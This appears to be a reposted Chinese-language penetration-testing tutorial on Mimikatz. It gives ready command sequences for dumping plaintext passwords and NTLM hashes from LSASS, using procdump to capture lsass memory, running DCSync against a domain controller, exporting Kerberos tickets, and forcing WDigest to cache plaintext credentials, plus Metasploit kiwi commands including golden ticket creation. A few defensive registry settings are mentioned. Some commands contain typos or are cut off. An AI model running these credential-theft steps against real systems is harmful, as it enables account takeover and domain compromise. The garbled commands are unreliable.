專案地址:https://github.com/gentilkiwi/mimikatz/
一、工具簡介
Mimikatz是法國人benjamin開發的一款功能強大的輕量級除錯工具,本意是用來個人測驗,但由于其功能強大,能夠直接讀取WindowsXP-2012等作業系統的明文密碼而聞名于滲透測驗,可以說是滲透必備工具,
注意:
當目標為win10或2012R2以上時,默認在記憶體快取中禁止保存明文密碼,但可以通過修改注冊表的方式抓取明文,
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
二、Mimikatz命令
cls: 清屏
standard: 標準模塊,基本命令
crypto: 加密相關模塊
sekurlsa: 與證書相關的模塊
kerberos: kerberos模塊
privilege: 提權相關模塊
process: 行程相關模塊
serivce: 服務相關模塊
lsadump: LsaDump模塊
ts: 終端服務器模塊
event: 事件模塊
misc: 雜項模塊
token: 令牌操作模塊
vault: Windows 、證書模塊
minesweeper:Mine Sweeper模塊
net:
dpapi: DPAPI模塊(通過API或RAW訪問)[資料保護應用程式編程介面]
busylight: BusyLight Module
sysenv: 系統環境值模塊
sid: 安全識別符號模塊
iis: IIS XML配置模塊
rpc: mimikatz的RPC控制
sr98: 用于SR98設備和T5577目標的RF模塊
rdm: RDM(830AL)器件的射頻模塊
acr: ACR模塊
version: 查看版本
exit: 退出
**提升權限 命令:privilege::debug **
mimikatz許多功能都需要管理員權限,如果不是管理員權限不能debug
三、示例
抓取明文密碼
在windows2012以上的系統不能直接獲取明文密碼了,當可以搭配procdump+mimikatz獲取密碼,
mimikatz # log
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
示例:windows server 2003
分析命令執行后的內容:
**msv:**這項是賬戶對應密碼的各種加密協議的密文,可以看到有LM、NTLM和SHA1加密的密文
**tspkg,wdigest,kerberos:**這個就是賬戶對應的明文密碼了,有的時候這三個對應的也不是全部都是一樣的,需要看服務器是什么角色,
**SSP:**是最新登錄到其他RDP終端的賬戶和密碼
模塊
sekurlsa模塊
sekurlsa::logonpasswords
抓取用戶NTLM哈希
sekurlsa::msv
加載dmp檔案,并匯出其中的明文密碼
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full
匯出lsass.exe行程中所有的票據
sekurlsa::tickets /export
kerberos模塊
列出系統中的票據
kerberos::list
kerberos::tgt
清除系統中的票據
kerberos::purge
匯入票據到系統中
kerberos::ptc 票據路徑
lsadump模塊
在域控上執行)查看域kevin.com內指定用戶root的詳細資訊,包括NTLM哈希等
lsadump::dcsync /domain:kevin.com /user:root
(在域控上執行)讀取所有域用戶的哈希
lsadump::lsa /patch
從sam.hive和system.hive檔案中獲得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive
從本地SAM檔案中讀取密碼哈希
token::elevate
lsadump::sam
wdigest
WDigest協議是在WindowsXP中被引入的,旨在與HTTP協議一起用于身份認證,默認情況下,Microsoft在多個版本的Windows(Windows XP-Windows 8.0和Windows Server 2003-Windows Server 2012)中啟用了此協議,這意味著純文本密碼存盤在LSASS(本地安全授權子系統服務)行程中, Mimikatz可以與LSASS互動,允許攻擊者通過以下命令檢索這些憑據
mimikatz #privilege::debug
mimikatz #sekurlsa::wdigest
在windows2012系統以及以上的系統之后這個默認是關閉的如果在 win2008 之前的系統上打了 KB2871997 補丁,那么就可以去啟用或者禁用 WDigest,Windows Server2012及以上版本默認關閉Wdigest,使攻擊者無法從記憶體中獲取明文密碼,Windows Server2012以下版本,如果安裝了KB2871997補丁,攻擊者同樣無法獲取明文密碼,配置如下鍵值:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
UseLogonCredential 值設定為 0, WDigest 不把憑證快取在記憶體;UseLogonCredential 值設定為 1, WDigest 就把憑證快取在記憶體,
使用powershell進行更改
開啟Wdigest Auth
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentCzontrolSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
關閉Wdigest Auth
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentCzontrolSet\Control\SecurityProvid
LSA保護
如何防止mimikatz獲取一些加密的密文進行PTH攻擊呢!其實微軟推出的補丁KB2871997是專門針對PTH攻擊的補丁,但是如果PID為500的話,還是可以進行PTH攻擊的!本地安全權限服務(LSASS)驗證用戶是否進行本地和遠程登錄,并實施本地安全策略, Windows 8.1及更高版本的系統中,Microsoft為LSA提供了額外的保護,以防止不受信任的行程讀取記憶體或代碼注入,Windows 8.1之前的系統,攻擊者可以執行Mimikatz命令來與LSA互動并檢索存盤在LSA記憶體中的明文密碼,
這條命令修改鍵的值為1,即使獲取了debug權限嗎,也不能直接獲取明文密碼和hash
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 1 /f
獲取高版本Windows系統的密碼憑證
使用procdump將lsass dump下來(需要管理員權限)
procdump.exe -accepteula -ma lsass.exe 1.dmp
使用mimikatz讀取密碼
mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit
msf中kiwi模塊
注:kiwi默認加載32位,如果目標系統位64位,將行程遷移到64位程式的行程中,
kiwi模塊使用
load kiwi //加載kiwi模塊
help kiwi //查看幫助
kiwi模塊命令
creds_all:列舉所有憑據
creds_kerberos:列舉所有kerberos憑據
creds_msv:列舉所有msv憑據
creds_ssp:列舉所有ssp憑據
creds_tspkg:列舉所有tspkg憑據
creds_wdigest:列舉所有wdigest憑據
dcsync:通過DCSync檢索用戶帳戶資訊
dcsync_ntlm:通過DCSync檢索用戶帳戶NTLM散列、SID和RID
golden_ticket_create:創建黃金票據
kerberos_ticket_list:列舉kerberos票據
kerberos_ticket_purge:清除kerberos票據
kerberos_ticket_use:使用kerberos票據
kiwi_cmd:執行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密碼
wifi_list:列出當前用戶的wifi組態檔
wifi_list_shared:列出共享wifi組態檔/編碼
creds_all
列舉系統中的明文密碼
kiwi_cmd
kiwi_cmd可以使用mimikatz中的所有功能,命令需要接上mimikatz的命令
kikiwi_cmd sekurlsa::logonpasswords
更多用法參考鏈接:https://www.freebuf.com/articles/web/176796.html
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/277470.html
標籤:其他
上一篇:hashMap的擴容原理
下一篇:檔案上傳的三道題